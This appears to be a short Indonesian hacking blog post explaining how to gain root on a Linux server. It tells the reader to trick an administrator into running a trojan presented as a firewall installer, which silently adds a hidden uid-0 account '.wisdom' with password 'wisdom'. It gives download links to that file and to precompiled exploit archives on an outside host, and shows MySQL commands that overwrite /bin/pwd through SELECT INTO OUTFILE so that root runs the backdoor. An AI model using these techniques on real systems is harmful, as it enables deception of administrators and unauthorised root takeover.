Soceng buat dapetin root
pancing rootnya buat ngerun file ini di mesinya (harus dirun saat dia uidnya root) (download ja):
http://mangga-dua.com/albums/thumb/wisdom
misal pk nama file firewall (bilang ja tu firewall buat boxnya)
klo dia kena trap ntar akan ada user baru di mesinya dg login: .wisdom dengan
password: wisdom dg uid 0 (uidnya root)
[root@vps776 tmp]# ./wisdom
Installing firewall..success
[root@vps776 tmp]#
(ni bukan bener 2 install firewall di mesinya tapi adduser .wisdom dg uid 0 dan password wisdom)
klo gak cobain aja master jebakan kek gini:
misal ente dapet mysqlnya aja running as root (mysql pid harus run as root)
misal:
$mysql -h localhost -u root -p
password:**************
mysql> create database tes;
Query OK, 1 row affected (0.01 sec)
mysql> CREATE TABLE `tes`.`tes` (
-> `tes` TEXT NOT NULL
-> ) ENGINE = MYISAM
-> ;
Query OK, 0 rows affected (0.02 sec)
mysql> INSERT INTO `tes`.`tes` (
-> `tes`
-> )
-> VALUES (
-> '/tmp/./wisdom'
-> );
Query OK, 1 row affected (0.00 sec)
mysql> use tes;
Database changed
mysql> select * from tes into outfile '/bin/pwd';
jadi tar begitu root aslinya ngetik pwd sech dia ngerun /tmp/.wisdom (file yg tadi)
(dg kondisi seting adduser ngebaca arg)
ntar klo dia ngerun perintah pwd tadi jadi ada user baru di mesinya dg login: .wisdom
password:wisdom (dg uid 0 uidnya root)
klo engak pk exploit ja master nich ane ada dikit:
http://mangga-dua.com/albums/thumb/compiled.tgz
http://mangga-dua.com/albums/thumb/compiled2.tgz
0 komentar:
